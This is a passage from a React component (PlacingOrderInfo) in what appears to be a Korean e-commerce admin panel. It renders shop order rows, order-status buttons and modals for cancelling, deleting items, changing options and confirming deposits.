                      {detailStatus(shopIndex, itemIndex)}
                    </span>
                  </div>
                  <div>
                    결제상태 :{' '}
                    <span className="text-red-600 font-semibold">
                      {paymentStatus(shopIndex, itemIndex)}
                    </span>
                  </div>
                  <div>
                    <Button
                      onClick={() => window.open(item.itemUrl, '_blank')}
                      size="xs"
                      theme="primary"
                    >
                      발주하기
                    </Button>
                  </div>
                  <div>
                    <Button
                      size="xs"
                      onClick={() =>
                        setState({
                          isDepositModalOpen: true,
                          orderAdditionalNumber:
                            item.additionalPayInfo?.orderAdditionalNumber || '',
                        })
                      }
                    >
                      입금처리
                    </Button>
                  </div>
                  <div>
                    <Button size="xs" onClick={() => changeOption(shopIndex, itemIndex)}>
                      옵션변경
                    </Button>
                  </div>
                  <div>
                    <Button
                      theme="danger"
                      size="xs"
                      onClick={() =>
                        setState({
                          isRemoveItemOpen: true,
                          itemOrderNumber: item.itemOrderNumber,
                          orderStatus: shop.orderStatus,
                          itemName: item.itemName,
                        })
                      }
                    >
                      상품삭제
                    </Button>
                  </div>
                </div>
              </div>
            ))}
            <td colSpan={9} className="p-0">
              <div className="py-4 font-bold text-xl flex items-center justify-center border-b">
                {`총 주문 금액: ${priceFormat(shop.payAmount)}원 (관부가세:
                ${priceFormat(shop.dutyAndTax)}원 / 배송비: ${priceFormat(
                  shop.deliveryFee
                )}원 / 배대지:
                ${priceFormat(shop.totalAdditionalFee)}원)`}
              </div>
              <div className="flex items-center justify-center py-4 border-b">
                <div className="flex items-center gap-2">
                  <div className="font-bold">
                    {shop.shopName}의 현재 발주상태(
                    <span className="text-red-600">
                      {SHOP_ORDER_STATUS[shop.orderStatus]}
                    </span>
                    )를
                  </div>
                  <Button
                    onClick={() =>
                      setState({
                        isOrderCancelOpen: true,
                        cancelOrderList: shop.itemOrderList.map(
                          ({
                            itemOrderNumber,
                            sizeName,
                            itemName,
                            itemImageUrl,
                            quantity,
                          }) => ({
                            itemOrderNumber,
                            orderCancelReason: '',
                            quantity,
                            sizeName,
                            itemName,
                            itemImageUrl,
                          })
                        ),
                        shopOrderNumber: shop.shopOrderNumber,
                      })
                    }
                  >
                    주문 취소 처리
                  </Button>
                  {shop.orderStatus != 'ORDER_WAITING' && (
                    <Button
                      isLoading={isAdditionalPayLoading}
                      onClick={() => onChangeWait(shopIndex)}
                    >
                      발주 대기로 전환
                    </Button>
                  )}
                  {shop.orderStatus == 'ORDER_WAITING' && (
                    <Button
                      onClick={() =>
                        Modal.confirm({
                          content: (
                            <div className="font-bold">
                              {shop.shopName}의 현재 발주상태(
                              <span className="text-red-600">
                                {SHOP_ORDER_STATUS[shop.orderStatus]}
                              </span>
                              )를 "신규 주문 관리" 로 전환하시겠습니까?
                            </div>
                          ),
                          onOk: async () => {
                            try {
                              await request.delete(
                                `/commerce/order/shop-order/${shop.shopOrderNumber}/order-wait`
                              );
                              await refreshOrderState();
                              message.success(`신규 주문 관리로 전환되었습니다.`);
                            } catch (error) {}
                          },
                          okText: '확인',
                          cancelText: '취소',
                        })
                      }
                    >
                      신규 주문 관리로 전환
                    </Button>
                  )}
                  <Button
                    onClick={() =>
                      setState({
                        isOrderCompleteOpen: true,
                        shopId: shop.shopId,
                        shopOrderNumber: shop.shopOrderNumber,
                      })
                    }
                  >
                    발주 완료로 전환
                  </Button>
                </div>
              </div>
            </td>
          </Fragment>
        )}
      />
      <AddItemModal
        isOpen={isAddItemOpen}
        onClose={() => setState({ isAddItemOpen: false, orderStatus: '' })}
        orderStatus={orderStatus}
      />
      <RemoveItemModal
        isOpen={isRemoveItemOpen}
        onClose={() =>
          setState({
            isRemoveItemOpen: false,
            itemName: '',
            itemOrderNumber: '',
            orderStatus: '',
          })
        }
        itemName={itemName}
        itemOrderNumber={itemOrderNumber}
        orderStatus={orderStatus}
      />
      <OrderCancelModal
        isOpen={isOrderCancelOpen}
        cancelOrderList={cancelOrderList}
        onClose={() =>
          setState({
            isOrderCancelOpen: false,
            cancelOrderList: [],
          })
        }
      />
      <OrderWaitModal
        isOpen={isOrderWaitOpen}
        shopOrderNumber={shopOrderNumber}
        onClose={() =>
          setState({
            isOrderWaitOpen: false,
            shopOrderNumber: '',
            additionalItemNumberList: [],
          })
        }
        additionalItemNumberList={additionalItemNumberList}
      />
      <OrderCompleteModal
        isOpen={isOrderCompleteOpen}
        shopOrderNumber={shopOrderNumber}
        shopId={shopId}
        onClose={() =>
          setState({
            isOrderCompleteOpen: false,
            shopOrderNumber: '',
            shopId: 0,
          })
        }
      />
      <ChangeItemOptionModal
        isOpen={isChangeItemOptionOpen}
        onClose={() =>
          setState({
            isChangeItemOptionOpen: false,
            orderStatus: '',
            shopOrderNumber: '',
          })
        }
        itemId={itemId}
        itemOrderNumber={itemOrderNumber}
        orderStatus={orderStatus}
        currentSizeName={currentSizeName}
        onMoveWait={(additionalItemNumberList) =>
          setState({
            additionalItemNumberList,
            isChangeItemOptionOpen: false,
            orderStatus: '',
            isOrderWaitOpen: true,
          })
        }
      />
      {isDepositModalOpen && (
        <DepositConfirmModal
          fetchingOrderNumber={fetchingOrderNumber}
          payAmount={payAmount}
          orderAdditionalNumber={orderAdditionalNumber}
          onClose={() =>
            setState({ isDepositModalOpen: false, orderAdditionalNumber: '' })
          }
        />
      )}
    </>
  );
};

export default PlacingOrderInfo;
